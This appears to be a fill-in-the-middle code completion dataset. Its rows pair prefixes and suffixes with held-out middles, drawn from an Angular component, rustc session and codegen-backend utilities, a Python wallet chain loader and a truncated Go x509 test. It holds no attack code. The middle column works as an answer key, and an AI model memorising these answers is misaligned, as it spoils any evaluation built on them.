file_name | prefix | suffix | middle
---|---|---|---|
app.component.ts | import { Component } from '@angular/core';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
}) | } | export class AppComponent {
nombre:string = 'Brayan';
apellido:string = "Laínez"; |
util.rs | use rustc_ast::mut_visit::{visit_clobber, MutVisitor, *};
use rustc_ast::ptr::P;
use rustc_ast::{self as ast, AttrVec, BlockCheckMode};
use rustc_codegen_ssa::traits::CodegenBackend;
use rustc_data_structures::fingerprint::Fingerprint;
use rustc_data_structures::fx::{FxHashMap, FxHashSet};
#[cfg(parallel_compiler)]
use rustc_data_structures::jobserver;
use rustc_data_structures::stable_hasher::StableHasher;
use rustc_data_structures::sync::Lrc;
use rustc_errors::registry::Registry;
use rustc_metadata::dynamic_lib::DynamicLibrary;
#[cfg(parallel_compiler)]
use rustc_middle::ty::tls;
use rustc_resolve::{self, Resolver};
use rustc_session as session;
use rustc_session::config::{self, CrateType};
use rustc_session::config::{ErrorOutputType, Input, OutputFilenames};
use rustc_session::lint::{self, BuiltinLintDiagnostics, LintBuffer};
use rustc_session::parse::CrateConfig;
use rustc_session::CrateDisambiguator;
use rustc_session::{early_error, filesearch, output, DiagnosticOutput, Session};
use rustc_span::edition::Edition;
use rustc_span::lev_distance::find_best_match_for_name;
use rustc_span::source_map::FileLoader;
use rustc_span::symbol::{sym, Symbol};
use smallvec::SmallVec;
use std::env;
use std::env::consts::{DLL_PREFIX, DLL_SUFFIX};
use std::io;
use std::lazy::SyncOnceCell;
use std::mem;
use std::ops::DerefMut;
#[cfg(not(parallel_compiler))]
use std::panic;
use std::path::{Path, PathBuf};
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::{Arc, Mutex, Once};
use std::thread;
use tracing::info;
/// Adds `target_feature = "..."` cfgs for a variety of platform
/// specific features (SSE, NEON etc.).
///
/// This is performed by checking whether a set of permitted features
/// is available on the target machine, by querying LLVM.
pub fn add_configuration(
cfg: &mut CrateConfig,
sess: &mut Session,
codegen_backend: &dyn CodegenBackend,
) {
let tf = sym::target_feature;
let target_features = codegen_backend.target_features(sess);
sess.target_features.extend(target_features.iter().cloned());
cfg.extend(target_features.into_iter().map(|feat| (tf, Some(feat))));
if sess.crt_static(None) {
cfg.insert((tf, Some(sym::crt_dash_static)));
}
}
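// Illustrative sketch (not part of the original file): with these cfgs set,
// downstream code can be gated on a detected feature, e.g.
//
//     #[cfg(target_feature = "sse2")]
//     fn simd_path(xs: &[f32]) -> f32 { /* vectorized */ xs.iter().sum() }
//
//     #[cfg(not(target_feature = "sse2"))]
//     fn simd_path(xs: &[f32]) -> f32 { xs.iter().sum() }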
pub fn create_session(
sopts: config::Options,
cfg: FxHashSet<(String, Option<String>)>,
diagnostic_output: DiagnosticOutput,
file_loader: Option<Box<dyn FileLoader + Send + Sync + 'static>>,
input_path: Option<PathBuf>,
lint_caps: FxHashMap<lint::LintId, lint::Level>,
make_codegen_backend: Option<
Box<dyn FnOnce(&config::Options) -> Box<dyn CodegenBackend> + Send>,
>,
descriptions: Registry,
) -> (Lrc<Session>, Lrc<Box<dyn CodegenBackend>>) {
let codegen_backend = if let Some(make_codegen_backend) = make_codegen_backend {
make_codegen_backend(&sopts)
} else {
get_codegen_backend(&sopts)
};
// target_override is documented to be called before init(), so this is okay
let target_override = codegen_backend.target_override(&sopts);
let mut sess = session::build_session(
sopts,
input_path,
descriptions,
diagnostic_output,
lint_caps,
file_loader,
target_override,
);
codegen_backend.init(&sess);
let mut cfg = config::build_configuration(&sess, config::to_crate_config(cfg));
add_configuration(&mut cfg, &mut sess, &*codegen_backend);
sess.parse_sess.config = cfg;
(Lrc::new(sess), Lrc::new(codegen_backend))
}
const STACK_SIZE: usize = 8 * 1024 * 1024;
fn get_stack_size() -> Option<usize> {
// FIXME: Hacks on hacks. If the env is trying to override the stack size
// then *don't* set it explicitly.
env::var_os("RUST_MIN_STACK").is_none().then_some(STACK_SIZE)
}
/// Like a `thread::Builder::spawn` followed by a `join()`, but avoids the need
/// for `'static` bounds.
#[cfg(not(parallel_compiler))]
pub fn scoped_thread<F: FnOnce() -> R + Send, R: Send>(cfg: thread::Builder, f: F) -> R {
struct Ptr(*mut ());
unsafe impl Send for Ptr {}
unsafe impl Sync for Ptr {}
let mut f = Some(f);
let run = Ptr(&mut f as *mut _ as *mut ());
let mut result = None;
let result_ptr = Ptr(&mut result as *mut _ as *mut ());
let thread = cfg.spawn(move || {
let run = unsafe { (*(run.0 as *mut Option<F>)).take().unwrap() };
let result = unsafe { &mut *(result_ptr.0 as *mut Option<R>) };
*result = Some(run());
});
match thread.unwrap().join() {
Ok(()) => result.unwrap(),
Err(p) => panic::resume_unwind(p),
}
}
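// Hypothetical usage sketch (not from the original source): because `F` only
// needs to be `Send`, not `'static`, the closure may borrow data from the
// caller's stack, which a plain `thread::Builder::spawn` would reject:
//
//     let data = vec![1u32, 2, 3];
//     let sum = scoped_thread(thread::Builder::new(), || data.iter().sum::<u32>());
//     assert_eq!(sum, 6);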
#[cfg(not(parallel_compiler))]
pub fn setup_callbacks_and_run_in_thread_pool_with_globals<F: FnOnce() -> R + Send, R: Send>(
edition: Edition,
_threads: usize,
stderr: &Option<Arc<Mutex<Vec<u8>>>>,
f: F,
) -> R {
let mut cfg = thread::Builder::new().name("rustc".to_string());
if let Some(size) = get_stack_size() {
cfg = cfg.stack_size(size);
}
crate::callbacks::setup_callbacks();
let main_handler = move || {
rustc_span::with_session_globals(edition, || {
io::set_output_capture(stderr.clone());
f()
})
};
scoped_thread(cfg, main_handler)
}
/// Creates a new thread and forwards information in thread locals to it.
/// The new thread runs the deadlock handler.
/// Must only be called when a deadlock is about to happen.
#[cfg(parallel_compiler)]
unsafe fn handle_deadlock() {
let registry = rustc_rayon_core::Registry::current();
let context = tls::get_tlv();
assert!(context != 0);
rustc_data_structures::sync::assert_sync::<tls::ImplicitCtxt<'_, '_>>();
let icx: &tls::ImplicitCtxt<'_, '_> = &*(context as *const tls::ImplicitCtxt<'_, '_>);
let session_globals = rustc_span::SESSION_GLOBALS.with(|sg| sg as *const _);
let session_globals = &*session_globals;
thread::spawn(move || {
tls::enter_context(icx, |_| {
rustc_span::SESSION_GLOBALS
.set(session_globals, || tls::with(|tcx| tcx.queries.deadlock(tcx, &registry)))
});
});
}
#[cfg(parallel_compiler)]
pub fn setup_callbacks_and_run_in_thread_pool_with_globals<F: FnOnce() -> R + Send, R: Send>(
edition: Edition,
threads: usize,
stderr: &Option<Arc<Mutex<Vec<u8>>>>,
f: F,
) -> R {
crate::callbacks::setup_callbacks();
let mut config = rayon::ThreadPoolBuilder::new()
.thread_name(|_| "rustc".to_string())
.acquire_thread_handler(jobserver::acquire_thread)
.release_thread_handler(jobserver::release_thread)
.num_threads(threads)
.deadlock_handler(|| unsafe { handle_deadlock() });
if let Some(size) = get_stack_size() {
config = config.stack_size(size);
}
let with_pool = move |pool: &rayon::ThreadPool| pool.install(f);
rustc_span::with_session_globals(edition, || {
rustc_span::SESSION_GLOBALS.with(|session_globals| {
// The main handler runs for each Rayon worker thread and sets up
// the thread local rustc uses. `session_globals` is captured and set
// on the new threads.
let main_handler = move |thread: rayon::ThreadBuilder| {
rustc_span::SESSION_GLOBALS.set(session_globals, || {
io::set_output_capture(stderr.clone());
thread.run()
})
};
config.build_scoped(main_handler, with_pool).unwrap()
})
})
}
fn load_backend_from_dylib(path: &Path) -> fn() -> Box<dyn CodegenBackend> {
let lib = DynamicLibrary::open(path).unwrap_or_else(|err| {
let err = format!("couldn't load codegen backend {:?}: {:?}", path, err);
early_error(ErrorOutputType::default(), &err);
});
unsafe {
match lib.symbol("__rustc_codegen_backend") {
Ok(f) => {
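// Intentionally leak the loaded library: the returned `fn()` pointer
// points into it, so it must stay mapped for the rest of the process.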
mem::forget(lib);
mem::transmute::<*mut u8, _>(f)
}
Err(e) => {
let err = format!(
"couldn't load codegen backend as it \
doesn't export the `__rustc_codegen_backend` \
symbol: {:?}",
e
);
early_error(ErrorOutputType::default(), &err);
}
}
}
}
pub fn get_codegen_backend(sopts: &config::Options) -> Box<dyn CodegenBackend> {
static INIT: Once = Once::new();
static mut LOAD: fn() -> Box<dyn CodegenBackend> = || unreachable!();
INIT.call_once(|| {
#[cfg(feature = "llvm")]
const DEFAULT_CODEGEN_BACKEND: &str = "llvm";
#[cfg(not(feature = "llvm"))]
const DEFAULT_CODEGEN_BACKEND: &str = "cranelift";
let codegen_name = sopts
.debugging_opts
.codegen_backend
.as_ref()
.map(|name| &name[..])
.unwrap_or(DEFAULT_CODEGEN_BACKEND);
let backend = match codegen_name {
filename if filename.contains('.') => load_backend_from_dylib(filename.as_ref()),
codegen_name => get_builtin_codegen_backend(codegen_name),
};
unsafe {
LOAD = backend;
}
});
unsafe { LOAD() }
}
// This is used for rustdoc, but it uses similar machinery to codegen backend
// loading, so we leave the code here. It is potentially useful for other tools
// that want to invoke the rustc binary while linking to rustc as well.
pub fn rustc_path<'a>() -> Option<&'a Path> {
static RUSTC_PATH: SyncOnceCell<Option<PathBuf>> = SyncOnceCell::new();
const BIN_PATH: &str = env!("RUSTC_INSTALL_BINDIR");
RUSTC_PATH.get_or_init(|| get_rustc_path_inner(BIN_PATH)).as_ref().map(|v| &**v)
}
fn get_rustc_path_inner(bin_path: &str) -> Option<PathBuf> {
sysroot_candidates().iter().find_map(|sysroot| {
let candidate = sysroot.join(bin_path).join(if cfg!(target_os = "windows") {
"rustc.exe"
} else {
"rustc"
});
candidate.exists().then_some(candidate)
})
}
fn sysroot_candidates() -> Vec<PathBuf> {
let target = session::config::host_triple();
let mut sysroot_candidates = vec![filesearch::get_or_default_sysroot()];
let path = current_dll_path().and_then(|s| s.canonicalize().ok());
if let Some(dll) = path {
// use `parent` twice to chop off the file name and then also the
// directory containing the dll which should be either `lib` or `bin`.
if let Some(path) = dll.parent().and_then(|p| p.parent()) {
// The original `path` pointed at the `rustc_driver` crate's dll.
// Now that dll should only be in one of two locations. The first is
// in the compiler's libdir, for example `$sysroot/lib/*.dll`. The
// other is the target's libdir, for example
// `$sysroot/lib/rustlib/$target/lib/*.dll`.
//
// We don't know which, so let's assume that if our `path` above
// ends in `$target` we *could* be in the target libdir, and always
// assume that we may be in the main libdir.
sysroot_candidates.push(path.to_owned());
if path.ends_with(target) {
sysroot_candidates.extend(
path.parent() // chop off `$target`
.and_then(|p| p.parent()) // chop off `rustlib`
.and_then(|p| p.parent()) // chop off `lib`
.map(|s| s.to_owned()),
);
}
}
}
return sysroot_candidates;
#[cfg(unix)]
fn current_dll_path() -> Option<PathBuf> {
use std::ffi::{CStr, OsStr};
use std::os::unix::prelude::*;
unsafe {
let addr = current_dll_path as usize as *mut _;
let mut info = mem::zeroed();
if libc::dladdr(addr, &mut info) == 0 {
info!("dladdr failed");
return None;
}
if info.dli_fname.is_null() {
info!("dladdr returned null pointer");
return None;
}
let bytes = CStr::from_ptr(info.dli_fname).to_bytes();
let os = OsStr::from_bytes(bytes);
Some(PathBuf::from(os))
}
}
#[cfg(windows)]
fn current_dll_path() -> Option<PathBuf> {
use std::ffi::OsString;
use std::os::windows::prelude::*;
use std::ptr;
use winapi::um::libloaderapi::{
GetModuleFileNameW, GetModuleHandleExW, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS,
};
unsafe {
let mut module = ptr::null_mut();
let r = GetModuleHandleExW(
GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS,
current_dll_path as usize as *mut _,
&mut module,
);
if r == 0 {
info!("GetModuleHandleExW failed: {}", io::Error::last_os_error());
return None;
}
let mut space = Vec::with_capacity(1024);
let r = GetModuleFileNameW(module, space.as_mut_ptr(), space.capacity() as u32);
if r == 0 {
info!("GetModuleFileNameW failed: {}", io::Error::last_os_error());
return None;
}
let r = r as usize;
if r >= space.capacity() {
info!("our buffer was too small? {}", io::Error::last_os_error());
return None;
}
space.set_len(r);
let os = OsString::from_wide(&space);
Some(PathBuf::from(os))
}
}
}
pub fn get_builtin_codegen_backend(backend_name: &str) -> fn() -> Box<dyn CodegenBackend> {
match backend_name {
#[cfg(feature = "llvm")]
"llvm" => rustc_codegen_llvm::LlvmCodegenBackend::new,
_ => get_codegen_sysroot(backend_name),
}
}
pub fn get_codegen_sysroot(backend_name: &str) -> fn() -> Box<dyn CodegenBackend> {
// For now we only allow this function to be called once as it'll dlopen a
// few things, which seems to work best if we only do that once. In
// general this assertion never trips due to the once guard in `get_codegen_backend`,
// but there are a few manual calls to this function in this file that we
// protect against.
static LOADED: AtomicBool = AtomicBool::new(false);
assert!(
!LOADED.fetch_or(true, Ordering::SeqCst),
"cannot load the default codegen backend twice"
);
let target = session::config::host_triple();
let sysroot_candidates = sysroot_candidates();
let sysroot = sysroot_candidates
.iter()
.map(|sysroot| {
let libdir = filesearch::relative_target_lib_path(&sysroot, &target);
sysroot.join(libdir).with_file_name("codegen-backends")
})
.find(|f| {
info!("codegen backend candidate: {}", f.display());
f.exists()
});
let sysroot = sysroot.unwrap_or_else(|| {
let candidates = sysroot_candidates
.iter()
.map(|p| p.display().to_string())
.collect::<Vec<_>>()
.join("\n* ");
let err = format!(
"failed to find a `codegen-backends` folder \
in the sysroot candidates:\n* {}",
candidates
);
early_error(ErrorOutputType::default(), &err);
});
info!("probing {} for a codegen backend", sysroot.display());
let d = sysroot.read_dir().unwrap_or_else(|e| {
let err = format!(
"failed to load default codegen backend, couldn't \
read `{}`: {}",
sysroot.display(),
e
);
early_error(ErrorOutputType::default(), &err);
});
let mut file: Option<PathBuf> = None;
let expected_name =
format!("rustc_codegen_{}-{}", backend_name, release_str().expect("CFG_RELEASE"));
for entry in d.filter_map(|e| e.ok()) {
let path = entry.path();
let filename = match path.file_name().and_then(|s| s.to_str()) {
Some(s) => s,
None => continue,
};
if !(filename.starts_with(DLL_PREFIX) && filename.ends_with(DLL_SUFFIX)) {
continue;
}
let name = &filename[DLL_PREFIX.len()..filename.len() - DLL_SUFFIX.len()];
if name != expected_name {
continue;
}
if let Some(ref prev) = file {
let err = format!(
"duplicate codegen backends found\n\
first: {}\n\
second: {}\n\
",
prev.display(),
path.display()
);
early_error(ErrorOutputType::default(), &err);
}
file = Some(path.clone());
}
match file {
Some(ref s) => load_backend_from_dylib(s),
None => {
let err = format!("unsupported builtin codegen backend `{}`", backend_name);
early_error(ErrorOutputType::default(), &err);
}
}
}
pub(crate) fn compute_crate_disambiguator(session: &Session) -> CrateDisambiguator {
use std::hash::Hasher;
// The crate_disambiguator is a 128 bit hash. The disambiguator is fed
// into various other hashes quite a bit (symbol hashes, incr. comp. hashes,
// debuginfo type IDs, etc), so we don't want it to be too wide. 128 bits
// should still be safe enough to avoid collisions in practice.
let mut hasher = StableHasher::new();
let mut metadata = session.opts.cg.metadata.clone();
// We don't want the crate_disambiguator to depend on the order of
// -C metadata arguments, so sort them:
metadata.sort();
// Every distinct -C metadata value is only incorporated once:
metadata.dedup();
hasher.write(b"metadata");
for s in &metadata {
// Also incorporate the length of a metadata string, so that we generate
// different values for `-Cmetadata=ab -Cmetadata=c` and
// `-Cmetadata=a -Cmetadata=bc`
hasher.write_usize(s.len());
hasher.write(s.as_bytes());
}
// Also incorporate crate type, so that we don't get symbol conflicts when
// linking against a library of the same name, if this is an executable.
let is_exe = session.crate_types().contains(&CrateType::Executable);
hasher.write(if is_exe { b"exe" } else { b"lib" });
CrateDisambiguator::from(hasher.finish::<Fingerprint>())
}
pub(crate) fn check_attr_crate_type(
sess: &Session,
attrs: &[ast::Attribute],
lint_buffer: &mut LintBuffer,
) {
// Unconditionally collect crate types from attributes to make them used
for a in attrs.iter() {
if sess.check_name(a, sym::crate_type) {
if let Some(n) = a.value_str() {
if categorize_crate_type(n).is_some() {
return;
}
if let ast::MetaItemKind::NameValue(spanned) = a.meta().unwrap().kind {
let span = spanned.span;
let lev_candidate = find_best_match_for_name(
&CRATE_TYPES.iter().map(|(k, _)| *k).collect::<Vec<_>>(),
n,
None,
);
if let Some(candidate) = lev_candidate {
lint_buffer.buffer_lint_with_diagnostic(
lint::builtin::UNKNOWN_CRATE_TYPES,
ast::CRATE_NODE_ID,
span,
"invalid `crate_type` value",
BuiltinLintDiagnostics::UnknownCrateTypes(
span,
"did you mean".to_string(),
format!("\"{}\"", candidate),
),
);
} else {
lint_buffer.buffer_lint(
lint::builtin::UNKNOWN_CRATE_TYPES,
ast::CRATE_NODE_ID,
span,
"invalid `crate_type` value",
);
}
}
}
}
}
}
const CRATE_TYPES: &[(Symbol, CrateType)] = &[
(sym::rlib, CrateType::Rlib),
(sym::dylib, CrateType::Dylib),
(sym::cdylib, CrateType::Cdylib),
(sym::lib, config::default_lib_output()),
(sym::staticlib, CrateType::Staticlib),
(sym::proc_dash_macro, CrateType::ProcMacro),
(sym::bin, CrateType::Executable),
];
fn categorize_crate_type(s: Symbol) -> Option<CrateType> {
Some(CRATE_TYPES.iter().find(|(key, _)| *key == s)?.1)
}
pub fn collect_crate_types(session: &Session, attrs: &[ast::Attribute]) -> Vec<CrateType> {
// Unconditionally collect crate types from attributes to make them used
let attr_types: Vec<CrateType> = attrs
.iter()
.filter_map(|a| {
if session.check_name(a, sym::crate_type) {
match a.value_str() {
Some(s) => categorize_crate_type(s),
_ => None,
}
} else {
None
}
})
.collect();
// If we're generating a test executable, then ignore all other output
// styles at all other locations
if session.opts.test {
return vec![CrateType::Executable];
}
// Only check command line flags if present. If no types are specified by
// command line, then reuse the empty `base` Vec to hold the types that
// will be found in crate attributes.
let mut base = session.opts.crate_types.clone();
if base.is_empty() {
base.extend(attr_types);
if base.is_empty() {
base.push(output::default_output_for_target(session));
} else {
base.sort();
base.dedup();
}
}
base.retain(|crate_type| {
let res = !output::invalid_output_for_target(session, *crate_type);
if !res {
session.warn(&format!(
"dropping unsupported crate type `{}` for target `{}`",
*crate_type, session.opts.target_triple
));
}
res
});
base
}
pub fn build_output_filenames(
input: &Input,
odir: &Option<PathBuf>,
ofile: &Option<PathBuf>,
attrs: &[ast::Attribute],
sess: &Session,
) -> OutputFilenames {
match *ofile {
None => {
// "-" as input file will cause the parser to read from stdin so we
// have to make up a name
// We want to toss everything after the final '.'
let dirpath = (*odir).as_ref().cloned().unwrap_or_default();
// If a crate name is present, we use it as the link name
let stem = sess
.opts
.crate_name
.clone()
.or_else(|| rustc_attr::find_crate_name(&sess, attrs).map(|n| n.to_string()))
.unwrap_or_else(|| input.filestem().to_owned());
OutputFilenames::new(
dirpath,
stem,
None,
sess.opts.cg.extra_filename.clone(),
sess.opts.output_types.clone(),
)
}
Some(ref out_file) => {
let unnamed_output_types =
sess.opts.output_types.values().filter(|a| a.is_none()).count();
let ofile = if unnamed_output_types > 1 {
sess.warn(
"due to multiple output types requested, the explicitly specified \
output file name will be adapted for each output type",
);
None
} else {
if !sess.opts.cg.extra_filename.is_empty() {
sess.warn("ignoring -C extra-filename flag due to -o flag");
}
Some(out_file.clone())
};
if *odir != None {
sess.warn("ignoring --out-dir flag due to -o flag");
}
OutputFilenames::new(
out_file.parent().unwrap_or_else(|| Path::new("")).to_path_buf(),
out_file.file_stem().unwrap_or_default().to_str().unwrap().to_string(),
ofile,
sess.opts.cg.extra_filename.clone(),
sess.opts.output_types.clone(),
)
}
}
}
// Note: Also used by librustdoc, see PR #43348. Consider moving this struct elsewhere.
//
// FIXME: Currently the `everybody_loops` transformation is not applied to:
// * `const fn`, due to issue #43636 that `loop` is not supported for const evaluation. We are
// waiting for miri to fix that.
// * `impl Trait`, due to issue #43869 that functions returning impl Trait cannot be diverging.
// Solving this may require `!` to implement every trait, which relies on an even more
// ambitious form of the closed RFC #1637. See also [#34511].
//
// [#34511]: https://github.com/rust-lang/rust/issues/34511#issuecomment-322340401
pub struct ReplaceBodyWithLoop<'a, 'b> {
within_static_or_const: bool,
nested_blocks: Option<Vec<ast::Block>>,
resolver: &'a mut Resolver<'b>,
}
impl<'a, 'b> ReplaceBodyWithLoop<'a, 'b> {
pub fn new(resolver: &'a mut Resolver<'b>) -> ReplaceBodyWithLoop<'a, 'b> {
ReplaceBodyWithLoop { within_static_or_const: false, nested_blocks: None, resolver }
}
fn run<R, F: FnOnce(&mut Self) -> R>(&mut self, is_const: bool, action: F) -> R {
let old_const = mem::replace(&mut self.within_static_or_const, is_const);
let old_blocks = self.nested_blocks.take();
let ret = action(self);
self.within_static_or_const = old_const;
self.nested_blocks = old_blocks;
ret
}
fn should_ignore_fn(ret_ty: &ast::FnRetTy) -> bool {
if let ast::FnRetTy::Ty(ref ty) = ret_ty {
fn involves_impl_trait(ty: &ast::Ty) -> bool {
match ty.kind {
ast::TyKind::ImplTrait(..) => true,
ast::TyKind::Slice(ref subty)
| ast::TyKind::Array(ref subty, _)
| ast::TyKind::Ptr(ast::MutTy { ty: ref subty, .. })
| ast::TyKind::Rptr(_, ast::MutTy { ty: ref subty, .. })
| ast::TyKind::Paren(ref subty) => involves_impl_trait(subty),
ast::TyKind::Tup(ref tys) => any_involves_impl_trait(tys.iter()),
ast::TyKind::Path(_, ref path) => {
path.segments.iter().any(|seg| match seg.args.as_deref() {
None => false,
Some(&ast::GenericArgs::AngleBracketed(ref data)) => {
data.args.iter().any(|arg| match arg {
ast::AngleBracketedArg::Arg(arg) => match arg {
ast::GenericArg::Type(ty) => involves_impl_trait(ty),
ast::GenericArg::Lifetime(_)
| ast::GenericArg::Const(_) => false,
},
ast::AngleBracketedArg::Constraint(c) => match c.kind {
ast::AssocTyConstraintKind::Bound { .. } => true,
ast::AssocTyConstraintKind::Equality { ref ty } => {
involves_impl_trait(ty)
}
},
})
}
Some(&ast::GenericArgs::Parenthesized(ref data)) => {
any_involves_impl_trait(data.inputs.iter())
|| ReplaceBodyWithLoop::should_ignore_fn(&data.output)
}
})
}
_ => false,
}
}
fn any_involves_impl_trait<'a, I: Iterator<Item = &'a P<ast::Ty>>>(mut it: I) -> bool {
it.any(|subty| involves_impl_trait(subty))
}
involves_impl_trait(ty)
} else {
false
}
}
fn is_sig_const(sig: &ast::FnSig) -> bool {
matches!(sig.header.constness, ast::Const::Yes(_))
|| ReplaceBodyWithLoop::should_ignore_fn(&sig.decl.output)
}
}
impl<'a> MutVisitor for ReplaceBodyWithLoop<'a, '_> {
fn visit_item_kind(&mut self, i: &mut ast::ItemKind) {
let is_const = match i {
ast::ItemKind::Static(..) | ast::ItemKind::Const(..) => true,
ast::ItemKind::Fn(box ast::FnKind(_, ref sig, _, _)) => Self::is_sig_const(sig),
_ => false,
};
self.run(is_const, |s| noop_visit_item_kind(i, s))
}
fn flat_map_trait_item(&mut self, i: P<ast::AssocItem>) -> SmallVec<[P<ast::AssocItem>; 1]> {
let is_const = match i.kind {
ast::AssocItemKind::Const(..) => true,
ast::AssocItemKind::Fn(box ast::FnKind(_, ref sig, _, _)) => Self::is_sig_const(sig),
_ => false,
};
self.run(is_const, |s| noop_flat_map_assoc_item(i, s))
}
fn flat_map_impl_item(&mut self, i: P<ast::AssocItem>) -> SmallVec<[P<ast::AssocItem>; 1]> {
self.flat_map_trait_item(i)
}
fn visit_anon_const(&mut self, c: &mut ast::AnonConst) {
self.run(true, |s| noop_visit_anon_const(c, s))
}
fn visit_block(&mut self, b: &mut P<ast::Block>) {
fn | (
rules: ast::BlockCheckMode,
s: Option<ast::Stmt>,
resolver: &mut Resolver<'_>,
) -> ast::Block {
ast::Block {
stmts: s.into_iter().collect(),
rules,
id: resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
tokens: None,
}
}
fn block_to_stmt(b: ast::Block, resolver: &mut Resolver<'_>) -> ast::Stmt {
let expr = P(ast::Expr {
id: resolver.next_node_id(),
kind: ast::ExprKind::Block(P(b), None),
span: rustc_span::DUMMY_SP,
attrs: AttrVec::new(),
tokens: None,
});
ast::Stmt {
id: resolver.next_node_id(),
kind: ast::StmtKind::Expr(expr),
span: rustc_span::DUMMY_SP,
}
}
let empty_block = stmt_to_block(BlockCheckMode::Default, None, self.resolver);
let loop_expr = P(ast::Expr {
kind: ast::ExprKind::Loop(P(empty_block), None),
id: self.resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
attrs: AttrVec::new(),
tokens: None,
});
let loop_stmt = ast::Stmt {
id: self.resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
kind: ast::StmtKind::Expr(loop_expr),
};
if self.within_static_or_const {
noop_visit_block(b, self)
} else {
visit_clobber(b.deref_mut(), |b| {
let mut stmts = vec![];
for s in b.stmts {
let old_blocks = self.nested_blocks.replace(vec![]);
stmts.extend(self.flat_map_stmt(s).into_iter().filter(|s| s.is_item()));
// we put a Some in there earlier with that replace(), so this is valid
let new_blocks = self.nested_blocks.take().unwrap();
self.nested_blocks = old_blocks;
stmts.extend(new_blocks.into_iter().map(|b| block_to_stmt(b, self.resolver)));
}
let mut new_block = ast::Block { stmts, ..b };
if let Some(old_blocks) = self.nested_blocks.as_mut() {
//push our fresh block onto the cache and yield an empty block with `loop {}`
if !new_block.stmts.is_empty() {
old_blocks.push(new_block);
}
stmt_to_block(b.rules, Some(loop_stmt), &mut self.resolver)
} else {
//push `loop {}` onto the end of our fresh block and yield that
new_block.stmts.push(loop_stmt);
new_block
}
})
}
}
}
/// Returns a version string such as "rustc 1.46.0 (04488afe3 2020-08-24)"
pub fn version_str() -> Option<&'static str> {
option_env!("CFG_VERSION")
}
/// Returns a version string such as "0.12.0-dev".
pub fn release_str() -> Option<&'static str> {
option_env!("CFG_RELEASE")
}
/// Returns the full SHA1 hash of HEAD of the Git repo from which rustc was built.
pub fn commit_hash_str() -> Option<&'static str> {
option_env!("CFG_VER_HASH")
}
/// Returns the "commit date" of HEAD of the Git repo from which rustc was built as a static string.
pub fn commit_date_str() -> Option<&'static str> {
option_env!("CFG_VER_DATE")
}
| stmt_to_block |
loader.py | import enum
import functools
from typing import Dict, Type
from electrum_gui.common.basic import bip44
from electrum_gui.common.coin import data
from electrum_gui.common.conf import chains as chains_conf
from electrum_gui.common.secret import data as secret_data
CHAINS_DICT = {}
COINS_DICT = {}
def _replace_enum_fields(raw_data: dict, fields: Dict[str, Type[enum.Enum]]):
|
def refresh_coins(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
global COINS_DICT
added_coins = chains_conf.get_added_coins(set(COINS_DICT.keys()))
if added_coins:
for coin in added_coins:
coininfo = data.CoinInfo(**coin)
COINS_DICT.setdefault(coininfo.code, coininfo)
return func(*args, **kwargs)
return wrapper
def refresh_chains(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
global CHAINS_DICT
for chain in chains_conf.get_added_chains(set(CHAINS_DICT.keys())):
_replace_enum_fields(
chain,
{
"chain_model": data.ChainModel,
"curve": secret_data.CurveEnum,
"bip44_last_hardened_level": bip44.BIP44Level,
"bip44_auto_increment_level": bip44.BIP44Level,
"bip44_target_level": bip44.BIP44Level,
},
)
chaininfo = data.ChainInfo(**chain)
CHAINS_DICT.setdefault(chaininfo.chain_code, chaininfo)
return func(*args, **kwargs)
return wrapper
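# Hypothetical usage sketch (the wrapped function and its names are assumptions,
# not from this file): accessors over the module-level dicts can be wrapped so
# the caches are refreshed from config before each call, e.g.
#
#   @refresh_coins
#   def get_coin_info(coin_code):
#       return COINS_DICT[coin_code]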
| for field_name, enum_cls in fields.items():
if field_name not in raw_data:
continue
enum_name = raw_data[field_name].upper()
enum_ins = enum_cls[enum_name]
raw_data[field_name] = enum_ins |
x509_test.go | /*
Copyright IBM Corp. 2017 All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/ |
package gmutil
import (
"crypto/rand"
"encoding/asn1"
"github.com/chinaso/fabricGM/cryptopkg/golangGM/sm2"
"github.com/chinaso/fabricGM/cryptopkg/golangGM/x509"
"crypto/x509/pkix"
"math/big"
"net"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func TestDERToX509Certificate(t *testing.T) {
testExtKeyUsage := []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth}
testUnknownExtKeyUsage := []asn1.ObjectIdentifier{[]int{1, 2, 3}, []int{2, 59, 1}}
extraExtensionData := []byte("extra extension")
commonName := "test.example.com"
template := x509.Certificate{
SerialNumber: big.NewInt(1),
Subject: pkix.Name{
CommonName: commonName,
Organization: []string{"Σ Acme Co"},
Country: []string{"US"},
ExtraNames: []pkix.AttributeTypeAndValue{
{
Type: []int{2, 5, 4, 42},
Value: "Gopher",
},
// This should override the Country, above.
{
Type: []int{2, 5, 4, 6},
Value: "NL",
},
},
},
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
//SignatureAlgorithm: x509.ECDSAWithSHA256,
SignatureAlgorithm: x509.SM2WithSM3,
SubjectKeyId: []byte{1, 2, 3, 4},
KeyUsage: x509.KeyUsageCertSign,
ExtKeyUsage: testExtKeyUsage,
UnknownExtKeyUsage: testUnknownExtKeyUsage,
BasicConstraintsValid: true,
IsCA: true,
OCSPServer: []string{"http://ocurrentBCCSP.example.com"},
IssuingCertificateURL: []string{"http://crt.example.com/ca1.crt"},
DNSNames: []string{"test.example.com"},
EmailAddresses: []string{"[email protected]"},
IPAddresses: []net.IP{net.IPv4(127, 0, 0, 1).To4(), net.ParseIP("2001:4860:0:2001::68")},
PolicyIdentifiers: []asn1.ObjectIdentifier{[]int{1, 2, 3}},
PermittedDNSDomains: []string{".example.com", "example.com"},
CRLDistributionPoints: []string{"http://crl1.example.com/ca1.crl", "http://crl2.example.com/ca1.crl"},
